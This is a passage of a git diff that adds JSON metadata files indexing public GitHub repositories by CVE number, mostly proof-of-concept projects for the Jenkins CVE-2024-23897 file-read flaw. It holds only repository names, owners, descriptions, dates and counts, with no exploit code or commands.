+ "fork": false,
+ "created_at": "2024-01-29T04:41:53Z",
+ "updated_at": "2024-04-24T12:09:15Z",
+ "pushed_at": "2024-01-31T03:14:07Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749788968,
+ "name": "CVE-2024-23897",
+ "full_name": "jopraveen\/CVE-2024-23897",
+ "owner": {
+ "login": "jopraveen",
+ "id": 56404692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56404692?v=4",
+ "html_url": "https:\/\/github.com\/jopraveen"
+ },
+ "html_url": "https:\/\/github.com\/jopraveen\/CVE-2024-23897",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-29T12:00:25Z",
+ "updated_at": "2024-01-29T18:02:51Z",
+ "pushed_at": "2024-01-29T12:14:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 751156545,
+ "name": "Jenkins-CVE-2024-23897",
+ "full_name": "AbraXa5\/Jenkins-CVE-2024-23897",
+ "owner": {
+ "login": "AbraXa5",
+ "id": 41234094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41234094?v=4",
+ "html_url": "https:\/\/github.com\/AbraXa5"
+ },
+ "html_url": "https:\/\/github.com\/AbraXa5\/Jenkins-CVE-2024-23897",
+ "description": "PoC for Jenkins CVE-2024-23897",
+ "fork": false,
+ "created_at": "2024-02-01T03:17:35Z",
+ "updated_at": "2024-02-05T03:54:30Z",
+ "pushed_at": "2024-02-04T18:31:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752057600,
+ "name": "CVE-2024-23897-RCE",
+ "full_name": "brijne\/CVE-2024-23897-RCE",
+ "owner": {
+ "login": "brijne",
+ "id": 158627341,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158627341?v=4",
+ "html_url": "https:\/\/github.com\/brijne"
+ },
+ "html_url": "https:\/\/github.com\/brijne\/CVE-2024-23897-RCE",
+ "description": "CVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE",
+ "fork": false,
+ "created_at": "2024-02-02T23:13:26Z",
+ "updated_at": "2024-02-02T23:13:27Z",
+ "pushed_at": "2024-02-02T23:19:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752485327,
+ "name": "Jenkins-CVE-2024-23897-",
+ "full_name": "WLXQqwer\/Jenkins-CVE-2024-23897-",
+ "owner": {
+ "login": "WLXQqwer",
+ "id": 125850977,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125850977?v=4",
+ "html_url": "https:\/\/github.com\/WLXQqwer"
+ },
+ "html_url": "https:\/\/github.com\/WLXQqwer\/Jenkins-CVE-2024-23897-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-04T01:14:40Z",
+ "updated_at": "2024-02-04T01:21:30Z",
+ "pushed_at": "2024-02-04T01:23:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752803918,
+ "name": "CVE-2024-23897",
+ "full_name": "kaanatmacaa\/CVE-2024-23897",
+ "owner": {
+ "login": "kaanatmacaa",
+ "id": 57772940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57772940?v=4",
+ "html_url": "https:\/\/github.com\/kaanatmacaa"
+ },
+ "html_url": "https:\/\/github.com\/kaanatmacaa\/CVE-2024-23897",
+ "description": "Nuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)",
+ "fork": false,
+ "created_at": "2024-02-04T20:56:42Z",
+ "updated_at": "2024-04-24T04:49:54Z",
+ "pushed_at": "2024-02-05T14:10:26Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": true,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 754184572,
+ "name": "CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability",
+ "full_name": "Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability",
+ "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.",
+ "fork": false,
+ "created_at": "2024-02-07T15:07:37Z",
+ "updated_at": "2024-03-01T18:35:57Z",
+ "pushed_at": "2024-02-09T13:22:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 757151446,
+ "name": "CVE-2024-23897",
+ "full_name": "B4CK4TT4CK\/CVE-2024-23897",
+ "owner": {
+ "login": "B4CK4TT4CK",
+ "id": 76169213,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76169213?v=4",
+ "html_url": "https:\/\/github.com\/B4CK4TT4CK"
+ },
+ "html_url": "https:\/\/github.com\/B4CK4TT4CK\/CVE-2024-23897",
+ "description": "CVE-2024-23897",
+ "fork": false,
+ "created_at": "2024-02-13T22:38:50Z",
+ "updated_at": "2024-02-13T22:40:08Z",
+ "pushed_at": "2024-02-13T22:44:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 758374072,
+ "name": "CVE-2024-23897",
+ "full_name": "godylockz\/CVE-2024-23897",
+ "owner": {
+ "login": "godylockz",
+ "id": 81207744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81207744?v=4",
+ "html_url": "https:\/\/github.com\/godylockz"
+ },
+ "html_url": "https:\/\/github.com\/godylockz\/CVE-2024-23897",
+ "description": "POC for CVE-2024-23897 Jenkins File-Read ",
+ "fork": false,
+ "created_at": "2024-02-16T07:16:04Z",
+ "updated_at": "2024-06-15T08:08:38Z",
+ "pushed_at": "2024-02-17T16:39:19Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 758722924,
+ "name": "CVE-2024-23897",
+ "full_name": "ifconfig-me\/CVE-2024-23897",
+ "owner": {
+ "login": "ifconfig-me",
+ "id": 25315805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4",
+ "html_url": "https:\/\/github.com\/ifconfig-me"
+ },
+ "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-23897",
+ "description": "Jenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]",
+ "fork": false,
+ "created_at": "2024-02-16T23:21:40Z",
+ "updated_at": "2024-02-16T23:23:25Z",
+ "pushed_at": "2024-02-17T15:20:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 759622445,
+ "name": "CVE-2024-23897",
+ "full_name": "ThatNotEasy\/CVE-2024-23897",
+ "owner": {
+ "login": "ThatNotEasy",
+ "id": 25004320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4",
+ "html_url": "https:\/\/github.com\/ThatNotEasy"
+ },
+ "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-23897",
+ "description": "Perform with massive Jenkins Reading-2-RCE",
+ "fork": false,
+ "created_at": "2024-02-19T02:29:12Z",
+ "updated_at": "2024-02-23T13:32:49Z",
+ "pushed_at": "2024-03-02T07:55:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": true,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 760525998,
+ "name": "CVE-2024-23897-Arbitrary-file-read",
+ "full_name": "pulentoski\/CVE-2024-23897-Arbitrary-file-read",
+ "owner": {
+ "login": "pulentoski",
+ "id": 60004847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4",
+ "html_url": "https:\/\/github.com\/pulentoski"
+ },
+ "html_url": "https:\/\/github.com\/pulentoski\/CVE-2024-23897-Arbitrary-file-read",
+ "description": "Un script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897 ",
+ "fork": false,
+ "created_at": "2024-02-20T15:26:34Z",
+ "updated_at": "2024-02-20T15:38:30Z",
+ "pushed_at": "2024-02-20T16:18:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 761368362,
+ "name": "CVE-2024-23897",
+ "full_name": "Nebian\/CVE-2024-23897",
+ "owner": {
+ "login": "Nebian",
+ "id": 57531705,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531705?v=4",
+ "html_url": "https:\/\/github.com\/Nebian"
+ },
+ "html_url": "https:\/\/github.com\/Nebian\/CVE-2024-23897",
+ "description": "Scraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.",
+ "fork": false,
+ "created_at": "2024-02-21T18:32:45Z",
+ "updated_at": "2024-02-23T23:55:35Z",
+ "pushed_at": "2024-02-21T19:07:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 763302810,
+ "name": "CVE-2024-23897",
+ "full_name": "Abo5\/CVE-2024-23897",
+ "owner": {
+ "login": "Abo5",
+ "id": 40110835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40110835?v=4",
+ "html_url": "https:\/\/github.com\/Abo5"
+ },
+ "html_url": "https:\/\/github.com\/Abo5\/CVE-2024-23897",
+ "description": "This is an exploit script for CVE-2024-23897, a vulnerability affecting certain systems. The script is intended for educational and testing purposes only. Ensure that you have the necessary permissions before using it.",
+ "fork": false,
+ "created_at": "2024-02-26T03:07:28Z",
+ "updated_at": "2024-02-27T06:15:40Z",
+ "pushed_at": "2024-02-26T05:14:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795412184,
+ "name": "CVE-2024-23897",
+ "full_name": "Athulya666\/CVE-2024-23897",
+ "owner": {
+ "login": "Athulya666",
+ "id": 55212811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55212811?v=4",
+ "html_url": "https:\/\/github.com\/Athulya666"
+ },
+ "html_url": "https:\/\/github.com\/Athulya666\/CVE-2024-23897",
+ "description": "Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability",
+ "fork": false,
+ "created_at": "2024-05-03T08:18:51Z",
+ "updated_at": "2024-05-03T08:33:15Z",
+ "pushed_at": "2024-05-03T08:33:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 797182683,
+ "name": "CVE-2024-23897",
+ "full_name": "murataydemir\/CVE-2024-23897",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2024-23897",
+ "description": "[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-05-07T11:00:03Z",
+ "updated_at": "2024-05-07T14:44:44Z",
+ "pushed_at": "2024-05-07T14:28:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 797525465,
+ "name": "CVE-2024-23897-Jenkins-4.441",
+ "full_name": "mil4ne\/CVE-2024-23897-Jenkins-4.441",
+ "owner": {
+ "login": "mil4ne",
+ "id": 89859279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4",
+ "html_url": "https:\/\/github.com\/mil4ne"
+ },
+ "html_url": "https:\/\/github.com\/mil4ne\/CVE-2024-23897-Jenkins-4.441",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-08T02:28:46Z",
+ "updated_at": "2024-05-08T02:34:07Z",
+ "pushed_at": "2024-05-08T02:34:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 801466453,
+ "name": "CVE-2024-23897",
+ "full_name": "Maalfer\/CVE-2024-23897",
+ "owner": {
+ "login": "Maalfer",
+ "id": 96432001,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96432001?v=4",
+ "html_url": "https:\/\/github.com\/Maalfer"
+ },
+ "html_url": "https:\/\/github.com\/Maalfer\/CVE-2024-23897",
+ "description": "Poc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos leer archivos internos del sistema sin estar autenticados",
+ "fork": false,
+ "created_at": "2024-05-16T09:32:51Z",
+ "updated_at": "2024-06-26T05:19:46Z",
+ "pushed_at": "2024-05-17T11:54:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806068547,
+ "name": "Surko-Exploit-Jenkins-CVE-2024-23897",
+ "full_name": "Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897",
+ "owner": {
+ "login": "Surko888",
+ "id": 69545458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69545458?v=4",
+ "html_url": "https:\/\/github.com\/Surko888"
+ },
+ "html_url": "https:\/\/github.com\/Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897",
+ "description": "Un exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)",
+ "fork": false,
+ "created_at": "2024-05-26T09:35:54Z",
+ "updated_at": "2024-06-01T23:48:46Z",
+ "pushed_at": "2024-06-01T23:48:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24034.json b/2024/CVE-2024-24034.json
new file mode 100644
index 0000000000..7803a73045
--- /dev/null
+++ b/2024/CVE-2024-24034.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753711004,
+ "name": "CVE-2024-24034",
+ "full_name": "ELIZEUOPAIN\/CVE-2024-24034",
+ "owner": {
+ "login": "ELIZEUOPAIN",
+ "id": 102467898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4",
+ "html_url": "https:\/\/github.com\/ELIZEUOPAIN"
+ },
+ "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24034",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T16:47:07Z",
+ "updated_at": "2024-02-09T08:21:07Z",
+ "pushed_at": "2024-02-06T17:09:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24035.json b/2024/CVE-2024-24035.json
new file mode 100644
index 0000000000..8b8feed306
--- /dev/null
+++ b/2024/CVE-2024-24035.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753765755,
+ "name": "CVE-2024-24035",
+ "full_name": "ELIZEUOPAIN\/CVE-2024-24035",
+ "owner": {
+ "login": "ELIZEUOPAIN",
+ "id": 102467898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4",
+ "html_url": "https:\/\/github.com\/ELIZEUOPAIN"
+ },
+ "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24035",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T18:49:34Z",
+ "updated_at": "2024-02-06T18:49:34Z",
+ "pushed_at": "2024-02-06T19:15:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24134.json b/2024/CVE-2024-24134.json
new file mode 100644
index 0000000000..dbbbf6e298
--- /dev/null
+++ b/2024/CVE-2024-24134.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742531876,
+ "name": "CVE-2024-24134",
+ "full_name": "BurakSevben\/CVE-2024-24134",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24134",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T17:31:15Z",
+ "updated_at": "2024-01-30T22:16:30Z",
+ "pushed_at": "2024-01-31T00:27:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24135.json b/2024/CVE-2024-24135.json
new file mode 100644
index 0000000000..ba5185cc7a
--- /dev/null
+++ b/2024/CVE-2024-24135.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742628195,
+ "name": "CVE-2024-24135",
+ "full_name": "BurakSevben\/CVE-2024-24135",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24135",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T22:49:01Z",
+ "updated_at": "2024-01-30T22:34:13Z",
+ "pushed_at": "2024-01-31T00:28:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24136.json b/2024/CVE-2024-24136.json
new file mode 100644
index 0000000000..d8c6f4bb63
--- /dev/null
+++ b/2024/CVE-2024-24136.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742615317,
+ "name": "CVE-2024-24136",
+ "full_name": "BurakSevben\/CVE-2024-24136",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24136",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T21:53:07Z",
+ "updated_at": "2024-01-30T22:51:47Z",
+ "pushed_at": "2024-01-31T00:29:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24137.json b/2024/CVE-2024-24137.json
new file mode 100644
index 0000000000..548b81330e
--- /dev/null
+++ b/2024/CVE-2024-24137.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742818106,
+ "name": "CVE-2024-24137",
+ "full_name": "BurakSevben\/CVE-2024-24137",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24137",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-13T13:11:35Z",
+ "updated_at": "2024-01-30T23:07:02Z",
+ "pushed_at": "2024-01-31T00:29:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24138.json b/2024/CVE-2024-24138.json
new file mode 100644
index 0000000000..8cbf7b4d5b
--- /dev/null
+++ b/2024/CVE-2024-24138.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742958060,
+ "name": "CVE-2024-24138",
+ "full_name": "BurakSevben\/CVE-2024-24138",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24138",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-13T21:48:00Z",
+ "updated_at": "2024-01-30T23:12:31Z",
+ "pushed_at": "2024-01-31T00:30:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24139.json b/2024/CVE-2024-24139.json
new file mode 100644
index 0000000000..12adfc0f9d
--- /dev/null
+++ b/2024/CVE-2024-24139.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 743331442,
+ "name": "CVE-2024-24139",
+ "full_name": "BurakSevben\/CVE-2024-24139",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24139",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-15T01:48:55Z",
+ "updated_at": "2024-01-30T23:16:22Z",
+ "pushed_at": "2024-01-31T00:30:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24140.json b/2024/CVE-2024-24140.json
new file mode 100644
index 0000000000..db0b0baa0d
--- /dev/null
+++ b/2024/CVE-2024-24140.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 746380106,
+ "name": "CVE-2024-24140",
+ "full_name": "BurakSevben\/CVE-2024-24140",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24140",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-21T21:45:34Z",
+ "updated_at": "2024-01-30T23:22:08Z",
+ "pushed_at": "2024-01-31T00:25:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24141.json b/2024/CVE-2024-24141.json
new file mode 100644
index 0000000000..158102f998
--- /dev/null
+++ b/2024/CVE-2024-24141.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 746416963,
+ "name": "CVE-2024-24141",
+ "full_name": "BurakSevben\/CVE-2024-24141",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24141",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-21T23:56:41Z",
+ "updated_at": "2024-01-30T23:44:32Z",
+ "pushed_at": "2024-01-31T00:32:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24142.json b/2024/CVE-2024-24142.json
